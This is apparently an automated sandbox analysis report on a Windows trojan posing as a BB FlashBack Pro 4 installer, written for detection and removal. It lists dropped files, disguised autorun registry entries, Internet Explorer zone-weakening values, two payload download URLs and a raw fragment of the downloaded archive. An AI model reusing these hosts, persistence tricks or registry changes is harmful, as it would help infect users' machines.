MD5: ea46ee27e1fbe7bf9d39c136fcdea33b
SHA1: 78527b3aa327fb1277b7ae132d9a1e97327f1764
SHA256: 8b7027c5ee801e063e6af99f0d2d1d352437cb8349d0fa02d0d0c964871dfbb8
SSDeep: 196608:MVBP5t/xcm9ZJiPy/puWpqC8NtYIYW8D8I W5ovz6NGzsTYlZA/D:sxlnRfpq38X z gA
Size: 14517248 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-10-02 20:03:56
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:1752
TempSetup.exe:444
Tempbbflbk4.exe:1908

Mutexes

The following mutexes were created/opened:

ZonesLockedCacheCounterMutex
ZonesCacheCounterMutex
ZonesCounterMutex
ShimCacheMutex

File activity

The process %original file name%.exe:1752 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Tempbbflbk4.exe (107182 bytes)
%Documents and Settings%\%current user%\Local Settings\TempSetup.exe (230 bytes)

The process TempSetup.exe:444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\system\svchost.exe (11964 bytes)
%WinDir%\system\server.zip (6671 bytes)
%WinDir%\system\taskhost.exe (3172 bytes)

The Trojan deletes the following file(s):

%WinDir%\system\server.zip (0 bytes)

The process Tempbbflbk4.exe:1908 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\AdvSplash.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\links.ini (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\modern-wizard.bmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\RemPendingFileOp.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\spltmp.bmp (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst2.tmp (1579032 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsi1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp (0 bytes)

Registry activity

The process %original file name%.exe:1752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 25 AC 30 77 FD 4A 76 15 97 F6 E4 E4 68 77 FE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1]
"Tempsetup.exe" = "Axlio"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1]
"Tempbbflbk4.exe" = "Tempbbflbk4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process TempSetup.exe:444 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CC 6F 40 B1 3F 39 FB 7D 9E 9F 45 30 20 C6 AD 54"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Intel(R) Common User Interface" = "C:\Windows\system\svchost.exe"

"Intel(R) Common User Windows" = "C:\Windows\system\taskhost.exe"

The process Tempbbflbk4.exe:1908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 73 92 E8 EF C5 E5 F9 27 5C 31 BB 81 03 62 D2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Blueberry
Product Name: BB FlashBack Pro 4
Product Version: 4.1.9.3121
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 4.1.9.3121
File Description:
Comments:
Language: Language Neutral

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://customtshirtsandhoodies.org/koxoa/meomu.txt	184.154.45.211
hxxp://songbienkhoipharma.com/images/advers/images/meomu.zip	125.212.220.231

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /images/advers/images/meomu.zip HTTP/1.1

Host: songbienkhoipharma.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Thu, 29 Oct 2015 02:56:49 GMT

Server: Apache/2

Last-Modified: Wed, 30 Sep 2015 14:55:48 GMT

ETag: "286f9a-c396-520f8203b30e2"

Accept-Ranges: bytes

Content-Length: 50070

Keep-Alive: timeout=1, max=100

Connection: Keep-Alive

Content-Type: application/zip
PK........).&Gd........`......svchost.exe{(............i...u...F._;9.b
......0%..m.o).....>...D.9T.X.{[email protected]
.....[.'.YuPBqP.o..&[...2....7&./'.b..n.......E.q.e|...-4..k].=!.h.D.m
q.bC....Z..l!......~...(.U..}.>u!.t.4lu..D8.l..y..w...\ .Q.2....$_0
...d.6^...'9..._.0<.....&...0..y..H.S.z....=,.....hE..]3~KC.....|.-
.".......d.K.<...!k8.v.4.e?"9...UU.A..-#.7jDc.. .O...m.Lx....'....S
c......,......5..`.....G..u6..."....T......J...oE..s3=C...0J..K-....]q
8q.....(...-........#9..)..,...HUC........;.?RC..Q........;...?)..W...
....Ku......*/.^s.vt..F.M.]$.!.bT...G.3.aPu.......d..g..)......5....K.
`..wM.?c..6.G....h...b.)..C..s.M4..;.g.......U1D.(.8..xS..(.q.3Q.(*N .
@......jc. 1...5....R&....^..;..G...C.s...Th........OT...vl.i.=.o.....
7.Z...K.W.......r.....7S.......$8....D..a.. ........x..:DCI{..nN....4.
...J.....W.x.....7L......e...r....:.0\.kK.......jr<[email protected].
.J..)......N ._z.....K.......}.-.......<.....xASO[..9....dyo>.n8
Y..K,........."g'F..a9....[...eK......t.`5...........{Lv.?..s$.Hx....6
hN..9.a.q..w......H.*....k.RW8....,...J0.....p.c%..f..........2.4.....
V.3...Y..:.-.k...ThE.pF..,..g`f....R..._.0....^.........s..T...$y.....
.o.Zc.P%..2...$.a..TD....\..).:...[........,[email protected].,stl..
/.'..~/.*F]...&3g.P....i....W.....mNj.u..K..t.... ...y....'..u..%...;m
[email protected].\..LA...Fv... ....|. ....[...2.g........D.7...mX*W.
m..e4..q....j.......&....L....C..Rx..6....^ .]...~..`.8..1.....yD.....
".....SV/.)...n..*...[..].Cx.1.......CFU.(....$L.."...g..dn..x....
<<< skipped >>>

GET /koxoa/meomu.txt HTTP/1.1

Host: customtshirtsandhoodies.org

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Thu, 29 Oct 2015 03:06:32 GMT

Last-Modified: Wed, 30 Sep 2015 15:06:23 GMT

ETag: "3c26d2-3c-520f8461eeb4f"

Content-Length: 60

Vary: User-Agent

Content-Type: text/plain

X-Varnish: 326474024

Age: 0

X-Cache: MISS

Connection: keep-alive

Accept-Ranges: bytes
hXXp://songbienkhoipharma.com/images/advers/images/meomu.zipHTTP/1.1 2
00 OK..Date: Thu, 29 Oct 2015 03:06:32 GMT..Last-Modified: Wed, 30 Sep
 2015 15:06:23 GMT..ETag: "3c26d2-3c-520f8461eeb4f"..Content-Length: 6
0..Vary: User-Agent..Content-Type: text/plain..X-Varnish: 326474024..A
ge: 0..X-Cache: MISS..Connection: keep-alive..Accept-Ranges: bytes..ht
tp://songbienkhoipharma.com/images/advers/images/meomu.zip..

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.ndata

.rsrc

uDSSh

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

KERNEL32.dll

ExitWindowsEx

GetAsyncKeyState

USER32.dll

GDI32.dll

SHFileOperationA

ShellExecuteA

SHELL32.dll

RegEnumKeyA

RegCreateKeyExA

RegCloseKey

RegDeleteKeyA

RegOpenKeyExA

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

logging set to %d

settings logging to %d

created uninstaller: %d, "%s"

WriteReg: error creating key "%s\%s"

WriteReg: error writing into "%s\%s" "%s"

WriteRegBin: "%s\%s" "%s"="%s"

WriteRegDWORD: "%s\%s" "%s"="0xx"

WriteRegExpandStr: "%s\%s" "%s"="%s"

WriteRegStr: "%s\%s" "%s"="%s"

DeleteRegKey: "%s\%s"

DeleteRegValue: "%s\%s" "%s"

WriteINIStr: wrote [%s] %s=%s in %s

CopyFiles "%s"->"%s"

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d

Error registering DLL: Could not load %s

Error registering DLL: %s not found in %s

Exec: failed createprocess ("%s")

Exec: success ("%s")

Exec: command="%s"

ExecShell: success ("%s": file:"%s" params:"%s")

ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d

Exch: stack < %d elements

RMDir: "%s"

MessageBox: %d,"%s"

Delete: "%s"

File: wrote %d to "%s"

File: skipped: "%s" (overwriteflag=%d)

File: error creating "%s"

File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"

Rename failed: %s

Rename on reboot: %s

Rename: %s

IfFileExists: file "%s" does not exist, jumping %d

IfFileExists: file "%s" exists, jumping %d

CreateDirectory: "%s" created

CreateDirectory: can't create "%s" - a file already exists

CreateDirectory: can't create "%s" (err=%d)

CreateDirectory: "%s" (%d)

SetFileAttributes: "%s":X

Sleep(%d)

detailprint: %s

Call: %d

Aborting: "%s"

Jump: %d

verifying installer: %d%%

unpacking data: %d%%

... %d%%

hXXp://nsis.sf.net/NSIS_Error

~nsu.tmp

install.log

%u.%u%s%s

Skipping section: "%s"

Section: "%s"

New install of "%s" to "%s"

RegDeleteKeyExA

RMDir: RemoveDirectory failed("%s")

RMDir: RemoveDirectory on Reboot("%s")

RMDir: RemoveDirectory("%s")

RMDir: RemoveDirectory invalid input("%s")

Delete: DeleteFile failed("%s")

Delete: DeleteFile on Reboot("%s")

Delete: DeleteFile("%s")

%s=%s

*?|<>/":

invalid registry key

HKEY_DYN_DATA

HKEY_CURRENT_CONFIG

HKEY_PERFORMANCE_DATA

HKEY_USERS

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

x%c

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\nsDialogs.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\nsDialogs.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp

mscoree.dll

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

.mixcrt

KERNEL32.DLL

operator

kernel32.dll

GetProcessWindowStation

USER32.DLL

PendingFileRenameOperations

c:\dev\PCWinCam\BCB6-new\RemPendingFileOp\Output\RemPendingFileOp.pdb

GetProcessHeap

GetCPInfo

RemPendingFileOp.dll

<*=0=4=8=<=

:*:5:9:>:

.reloc

UserInfo.dll

System.dll

callback%d

ZE[.LVF.

%o.MA

nsi3.tmp

File: skipped: "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp\nsDialogs.dll" (overwriteflag=1)

p\nsDialogs.dll"

\"%CurrentUserName%"\LOCALS~1\Temp\nsi3.tmp

DOCUME~1\"%CurrentUserName%"\LOCALS~1\Tempbbflbk4.exe"

"C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Tempbbflbk4.exe"

%Program Files%\Blueberry Software\BB FlashBack Pro 4

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1

Tempbbflbk4.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsi1.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Tempbbflbk4.exe

889848471

1245492

1245446

1359282841

638190238

456789:0

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>

VVV.bbconsult.co.uk

Remove File Pending Operations

1, 0, 0, 1

00000000

CompanyWebsite

hXXp://VVV.bbflashback.com/

4.1.9.3121

Tempbbflbk4.exe_1908_rwx_011C4000_00001000:

callback%d

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):No processes have been created.
2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %Documents and Settings%\%current user%\Local Settings\Tempbbflbk4.exe (107182 bytes)
   %Documents and Settings%\%current user%\Local Settings\TempSetup.exe (230 bytes)
   %WinDir%\system\svchost.exe (11964 bytes)
   %WinDir%\system\server.zip (6671 bytes)
   %WinDir%\system\taskhost.exe (3172 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\nsDialogs.dll (9 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\AdvSplash.dll (6 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\links.ini (286 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\UserInfo.dll (4 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\modern-wizard.bmp (1568 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\RemPendingFileOp.dll (2392 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\System.dll (11 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nsi3.tmp\spltmp.bmp (16424 bytes)
   %Documents and Settings%\%current user%\Local Settings\Temp\nst2.tmp (1579032 bytes)

4. Delete the following value(s) in the autorun key (How to Work with System Registry):
   

   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "Intel(R) Common User Interface" = "C:\Windows\system\svchost.exe"
   
   [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   "Intel(R) Common User Windows" = "C:\Windows\system\taskhost.exe"

5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
   
6. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.